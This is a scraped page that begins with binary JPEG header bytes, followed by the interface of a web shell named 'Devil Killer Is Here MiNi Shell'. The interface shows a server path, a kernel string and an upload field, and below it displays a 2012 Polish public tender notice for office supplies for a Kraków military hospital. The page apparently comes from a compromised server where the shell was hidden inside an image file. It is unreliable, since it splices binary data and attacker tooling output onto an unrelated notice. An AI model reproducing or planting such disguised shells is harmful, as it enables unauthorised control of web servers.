JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120412/82531-N-2012.html

<p class="kh_header"><b>Kraków: DOSTAWY MATERIAŁÓW I DROBNEGO SPRZETU BIUROWEGO</b><br>
<b>Numer ogłoszenia: 82531 - 2012; data zamieszczenia: 12.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY MATERIAŁÓW I DROBNEGO SPRZETU BIUROWEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1	Aktówka z przekładkami 12 przekładek transparentnych z miejscem na opis	22800000-8	szt	3					
2	Antyrama szkło 210x300	30190000-7	szt	10					
3	Antyrama szkło 300x400	30190000-7	szt	10					
4	Antyrama szkło 400x500	30190000-7	szt	10					
5	Bibuła marszczona mix (10 szt) 	30199780-1	op	10					
6	Bibuła metalizowana marczczona mix (6 szt)	30199780-1	op	5					
7	Blok listowy, kratka, A4, 100 kartek.	22816000-3	szt 	20					
8	Blok rysunkowy A3 10 k	22816000-3	szt	20					
9	Blok rysunkowy A4 20 k	22816000-3	szt	20					
10	Blok techniczny A4 10 kartek	22816000-3	szt	10					
11	Cienkopis różne kolory grubośc lini 0,4 mm	30192125-3	szt	100					
12	Datownik, samotuszujący mini, wysokość liter 3,8 mm	30192150-7	szt 	10					
13	Długopis automatyczny, grubość 0,5 mm, różne kolory, z gumową obsadką (piszące na drukach samokopiujących z obu stron)	30192121-5	szt 	700					
14	Długopis, grubocść 0,5 mm, różne kolory,(piszące na drukach samokopiujących z obu stron)	30192121-5 	szt	700					
15	Długopis, wkład, grubość 0,7 mm, różne kolory z gumową obsadką,zelowy	30192121-5	szt	200					
16	Druki KP samokopiujace po 100 kartek, wielokopia (nadruk czarny)	22822200-0	bl	350					
17	Dyplom A4	30199500-5	szt	100					
18	Dziurkacz biurowy, regulacja rozmiaru papieru, dziurkuje do 25 kartek 80 g/M2 	30197330-8	szt	10					
19	Dziurkacz dekoracyjny różne wzory dzurkowania 	30197330-8	szt	5					
20	Dziurkacz ozdobny brzegowy 	30197330-8	szt	2					
21	Dziurkacz ozdobny narożnikowy	30197330-8	szt	2					
22	Etykiety 105x74mm w opakowaniu po 100 arkuszy, białe, samoprzylepne do drukarek laserowych	30192800-9	op	2					
23	Etykiety 210x297mm w opakowaniu po 100 arkuszy, białe, samoprzylepne do drukarek laserowych	30192800-9	op	2					
24	Etykiety 38x21,2mm w opakowaniu po 100 arkuszy, białe, samoprzylepne do drukarek laserowych	30192800-9	op	95					
25	Farby akryl 12 kol 12 ml 	22610000-9	op	5					
26	Farby akryl 40 ml szt różne kolory	22610000-9	szt	20					
27	Farby akwarelowe 10 kolorów 	22610000-9	op	10					
28	Farby plakatowe 12 kolorów	22610000-9	op	5					
29	Farby witrażowe 12 kol 10,5 ml	22610000-9	op	15					
30	Filc zabawkarski 20x30cm różne kolory	301199780-1	szt	40					
31	Folia do laminowania, A4 po 100 szt., 216x303mm, 100 mikronów.	30190000-7	op	4					
32	Folia do laminowania, wizytówkowa po 100 szt., 60x95mm, 175 mikronów.	30190000-7	op	3					
33	Folia do palet przeżroczysta	30190000-7	szt	12					
34	Folia przeźroczysta A4 do bindowania, opakowanie (100 szt.) 150 mic.	30190000-7	op	2					
35	Grzbiety plastikowe do bind 16 mm 100 szt	30190000-7	op	1					
36	Gumka ołowkowa mała 43x17,4x11,7 mm 	30192100-2	szt	50					
37	Gumka recepturka	30190000-7	op	5					
38	Kalendarz biurkowy,stojacy na 2013rok	30199792-8	szt	120					
39	Kalendarz trojdzielny,wiszacy na 2013 rok	30199792-8	szt	120					
40	Kalka maszynowa A4 opak 10 szt (samoistnie regenerująca się)	30199110-4	op	5					
41	Karton kolorowy 240 g 100x70	30199730-5	szt	50					
42	Karton wizytówkowy (płutno białe)	30199730-5	szt	100					
43	Klej biały w tubie 40 ml	24910000-6	szt	24					
44	Klej biurowy magiczny 40 g	24910000-6	szt	40					
45	Klej do dekupażu 230 ml	24910000-6	szt	5					
46	Klej introligatorski nietoksyczny wodny netto 60 g  3	24910000-6	szt	40					
47	Klej w sztyfcie 15g. nietoksyczny posiadaźć atest PZH	24910000-6	szt	300					
48	Klej z brokatem 10,5 ml 5 kolorów 	24910000-6	op	12					
49	Klip A5 teczka różne kolory	30191130-4	szt	20					
50	Klip deska A4 różne kolory	30191130-4	szt	30					
51	Klip teczka A4 różne kolory	30191130-4	szt	30					
52	Klipsy do spinania dokumętów (100 szt.)	30190000-7	op	5					
53	Koperta (biała) bez okienka samoprzylepna 110x220mm. (50 szt.)	30199230-1	op	10					
54	Koperta (biała) z okienkiem samoprzylepna po lewej stronie 110x220mm. (50 szt.)	30199230-1	op	80					
55	Koperta (biała) z okienkiem samoprzylepna po prawej stronie 110x220mm. (50 szt.)	30199230-1	op	20					
56	Koperta B4 samoprzylepne, brązowa. (50 szt.)	30199230-1	op	10					
57	Koperta B5 zaklejana na mokro, brązowa. (500 szt.)	30199230-1	op	100					
58	Koperta C4 samoprzylepne, brązowa. (50 szt.)	30199230-1	op	40					
59	Koperta C5, biała, samo klejąca (50 szt.)	30199230-1	op	50					
60	Koperta C6, biała, samo klejąca (50 szt.)	30199230-1	op	50					
61	Kopeta z zabezpieczeniem bąbelkowym 150x 215 białe	30199230-1	szt	20					
62	Kopeta z zabezpieczeniem bąbelkowym 220x340 białe	30199230-1	szt	20					
63	Korektor w taśmie mini, biały, szer. taśmy 4,2 mm, dł. 6 mb	30192160-0	szt	100					
64	Korektor wodny w piórze,	30192930-9	szt	30					
65	Korektor wodny z pędzelkiem, 20 ml.	30192160-0	szt	120					
66	Koszulka A4 na dokumenty do segregatora, opakowanie po 100 szt., groszkowa.	30190000-7	op	220					
67	Kredki ołówkowe 12 kol.	30192130-1	op	5					
68	Krepina różne kolory	30199780-1	szt	25					
69	Linijka plastikowa, długość 30cm.	30190000-7	szt	20					
70	Listwy do oprawy różne kolory 3-6 mm - elastyczne (50 szt.) 	30190000-7	op	5					
71	Listwy do oprawy różne kolory 9-12 mm - elastyczne (50 szt.) 	30190000-7	op	6					
72	Marker do płyt CD/DVD, grubość 0,5 mm, różne kolory.	30192125-3	szt	50					
73	Marker permamentny z okrągłą końcówką różne kolory posiadający normę ISO 9001 piszący po szkle, metalu, plastiku, gumie, grubym papierze, drewnie grubośc pisania 1,5 mm i 4,5 x 1,2 mm	30192125-3	szt	600					
74	Marker sucho ścieralny okrągła końcówka gr lini 1,9 mm różne kolory	30192125-3	szt	15					
75	Markery zdobnicze 6,5 ml końcówka okrągła z tłoczkiem gr pisania 2,5 mm różne kolory	30192125-3	szt	6					
76	Masa mocująca biała 50g 	44424200-0	op	3					
77	Masa mocująca kolorowa 50g 	44424200-0	op	2					
78	Notes samoprzylepny 40x50mm 100 katr	22816300-6	szt	100					
79	Notes samoprzylepny 76x76mm/100 kartek.	22816300-6	szt	50					
80	Nożyczki do papieru, z plastikowym uchwytem, długość 21cm (długość ostrza).	30190000-7	szt	30					
81	Nóż do listów z drewnianą rękojeścią	30199780-1	szt	5					
82	Ofertówka z pcv	30190000-7	szt	50					
83	Okładka A4 do bindowania, skóropodobna, różne kolory, opakowanie a 100 sztuk.	30190000-7	op	30					
84	Okładka do termobindownicy mini	30192500-6	szt	100					
85	Okładka kanałowa AA,A,B,C - różne kolory (oprawa mięka nie przeżroczysta )	30190000-7	szt	250					
86	Okładka kanałowa AA,A,B,C - różne kolory (oprawa twarda )	30190000-7	szt	250					
87	Okładki na dyplom A4, twarde, oklejane materiałem skóropodobnym, różne kolory.	30190000-7	szt	10					
88	Olej do niszczarek 350 ml	30192000-1	szt	2					
89	Ołówek z gumką, HB	30192130-1	szt	58					
90	Ołówek 4H	30192130-1	szt	12					
91	Pastele olejne 12 kolorów	30192125-3	op	5					
92	Pastele suche 12 kolorów	30192125-3	op	1					
93	Pędzel płaski szczecina nr 10	30192125-3	szt	10					
94	Pędzel płaski szczecina nr 8	30192125-3	szt	10					
95	Pinezka metalowa 30 szt tapicerskie	30190000-7	op	10					
96	Pióro kulkowe, różne kolory 0,5 mm.	30192121-5	szt	20					
97	Pisaki: 24 (cztery) kolory w opakowaniu, dwustronne, cienki / gruby.	30192125-3	szt	5					
98	Pisaki: 4 (cztery) kolory w opakowaniu, dwustronne, cienki  gruby.	30192125-3	op	20					
99	Pistolet do kleju polimerowego	30190000-7	szt	2					
100	Plastelina (6 szt opak)	30190000-7	op	5					
101	Pocztowa ksiazka nadawcza A-5	22800000-8	bl	25					
102	Poduszka do stępli plastikowa , nasączona, różne kolory 110x70mm	30192111-2	szt	10					
103	Pojemnik na dokumenty plastiowy A4 stojący różne kolory	30190000-7	szt	10					
104	Pojemnik do archiwicacji 100 mm	30190000-7	szt	50					
105	Pojemnik do archiwicacji 80 mm	30190000-7	szt	50					
106	Pojemnik do archiwizacji zbiorczej tekturowy otwierany od góry 530x267x368	30190000-7	szt	10					
107	Przekładka alfabetyczna A4 do segregatora	30190000-7	szt	5					
108	Przypinacze tablicowe 30 szt opak	30197100-7	op	10					
109	Rolka termiczna (110mm x 20m) 10 szt w opak	30192350-9	op	2					
110	Rolka termiczna (28mm x 20m) 10 szt w opak	30192350-9	op	20					
111	Rolka termiczna (56mm x 30m) 10 szt w opak	30192350-9	op	24					
112	Rolka barwiąca do kalkulatora dwu kolorowa	30192350-9	szt	10					
113	Rolka offset 57mm 30mb. - 10szt. w opakowaniu	30192350-9	op	5					
114	Rolka termiczna (28mm x 25m) 10 szt w opak	30192350-9	szt	30					
115	Rozszywacz	30190000-7	szt	10					
116	Segregator A4, szerokość 35mm, na dwa lub cztery ringi,różne kolory 	30199500-5	szt	50					
117	Segregator A4, szerokość 40mm, na dwa lub cztery ringi,różne kolory 	30199500-5	szt	50					
118	Segregator A4, szerokość 50mm, na dwa otwory,różne kolory z okuciem	30199500-5	szt	100					
119	Segregator A4, szerokość 70mm, na dwa otwory,różne kolory z okuciem	30199500-5	szt	200					
120	Segregator A5, szerokość 70mm, na dwa otwory różne kolory z okuciem	30199500-5	szt	30					
121	Serwetka papierowa 3 warstwy330x330 opak 20 szt różne kolory	30199780-1	op	30					
122	Skoroszyt A4, plastikowy, różne kolory z mozliwością wpinania do segregatora	22851000-0	szt	200					
123	Skoroszyt A4, plastikowy, różne kolory.	22851000-0	szt	100					
124	Skorowidz 3 4 A4	30190000-7	szt	5					
125	Spinacze biurowe okrągłe 28mm, opakowanie po 100 sztuk.	30197220-4	op	300					
126	Spinacze-klipsy 19mm, po 12 sztuk w opakowaniu.	30197220-4	op	25					
127	Spinacze-klipsy 25mm po 12 sztuk w opakowaniu.	30197220-4	op	25					
128	Spinacze-klipsy 32mm po 12 sztuk w opakowaniu.	30197220-4	op	20					
129	Spinacze-klipsy 41mm po 12 sztuk w opakowaniu.	30197220-4	op	10					
130	Spinacze-klipsy 51mm po 12 sztuk w opakowaniu.	30197220-4	op	10					
131	Sznurek poliamidowy 15 mb 	39541130-6	szt	25					
132	Szpilki z kolorowymi łebkami	30197210-4	op	10					
133	Szuflafda plastikowa na dokumenty	30193200-0	szt	20					
134	Tablica korkowa 100x80 cm.	30195000-2	szt	4					
135	Tablica magnetyczna 60x90	30195920-7	szt	4					
136	Taśma dwustronna klejąca, szerokość min. 30mm/4mb.	44424200-0	szt	30					
137	Taśma pakowa 48mm 50 mb przeżroczysta	44424200-0	szt	60					
138	Taśma przeźroczysta klejąca 18mm 20mb.	44424200-0	szt	50					
139	Teczka A4, skrzydłowa, kolorowa, zapinana na rzep, (tektura 750g).szerokosc 3,5cm 	30190000-7	szt	10					
140	Teczka A4, tekturowa z gumką, różne kolory (tektura 450g).	30190000-7	szt	400					
141	Teczka A4, tekturowa, wiązana, biała (tektura 450g).	30190000-7	szt	50					
142	Teczka do podpisu 12 przegrudek	22800000-8	szt	5					
143	Teczka tekturowa z gumką biała 350g	30190000-7	szt	300					
144	Teczka zawieszana 210g m2 różne kolory	30190000-7	szt	200					
145	Tektura falista 300 g B2 różne kolory 	22993400-1	szt	50					
146	Terminarz A4 jeden dzień na stronie na 2013 rok	30196100-0	szt	1					
147	Terminarz A4 tydzień na dwóch stronach na 2013 rok	30196100-0	szt	5					
148	Terminarz A-5 jeden dzień na stronie na 2013 rok 	30196100-0	szt	150					
149	Wkład do pistoletu polimer klej	30190000-7	szt	60					
150	Wkłady do długopisów gel G-2 różne kolory 12 szt w opak	30192121-5	op	2					
151	Wkłady ołówkowe 0,5 mm twardość B dłógość wkłau 60 mm w opak po12 szt	30192121-5	op	12					
152	Zakładka 4 kolorowa (indeksująca)	30192800-9	op	10					
153	Zakreślacz, różne kolory.	30192125-3	szt	100					
154	Zastrugaczka metalowa 	30190000-7	szt	40					
155	Zestaw pęzli 9 grubośći 2-16 	30192125-3	op	5					
156	Zeszyt A4, 96 kartek, kratka, z marginesem, oprawa twarda, szyty.	22815000-6	szt	100					
157	Zeszyt A5, 32 kartki, kratka, z marginesem, oprawa miękka.	22815000-6	szt	50					
158	Zeszyt A5, 60 kartek, kratka, z marginesem, oprawa miękka.	22815000-6	szt	50					
159	Zeszyt A5,96 kartek, kratka, z marginesem, oprawa twarda, szyty.	22815000-6	szt	100					
160	Zszywacz biurowy dla 100 zszywek 24/6 lub 26/6, możliwość zszycia 20 kartek wielokrotnie, 80 g/m2. metalowy mechanizm zszywający 5 lat gwarancji	30197320-5	szt	20					
161	Zszywki 10 5mm opak 1000szt	30197100-7	op	100					
162	Zszywki 9 17mm op 1000 szt	30197100-7	op	3					
163	Zszywki biurowe 24 6, 1000 szt. w opakowaniu.	30197100-7	op	400.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8, 30.19.00.00-7, 30.19.97.80-1, 22.81.60.00-3, 30.19.21.25-3, 30.19.21.25-7, 30.19.50.00-5, 30.19.73.30-8, 30.19.28.00-9, 30.19.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2.	Wypełniony we wskazanych miejscach - FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3.	Pełnomocnictwo umocowujące przynajmniej w zakresie podpisania oferty w postępowaniu 
o udzielenie zamówienia publicznego, dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę.
4.	Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ, a także ZAŁĄCZNIK NR 3A i co za tym idzie pisemne celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (o ile dotyczy).
5.	Oświadczenie Wykonawcy dotyczące niepodlegania wykluczeniu ściśle według formularza stanowiącego ZAŁĄCZNIKIEM NR 4 do SIWZ.
6.	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, jeżeli odrębne przepisy wymagają wpisu do rejestru.
7.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt  6 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a.	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o których mowa w pkt 7 , zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 8 stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Sprzedający, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości towaru,
wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),
zmian organizacyjnych Zamawiającego powodujących, iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe
zmian w zakresie sposobu wykonywania zadań lub zasad funkcjonowania Zamawiającego powodujących iż wykonanie zamówienia lub jego części staje się bezprzedmiotowe lub zaistniała konieczność modyfikacji przedmiotu zamówienia
omyłek pisarskich lub błędów rachunkowych,
mających na celu wyjaśnienie wątpliwości treści umowy, jeśli będzie ona budziła wątpliwości interpretacyjne między stronami,
jeżeli zmiany umowy, w tym zmiany sposobu płatności, wymagać będzie ochrona interesu Zamawiającego
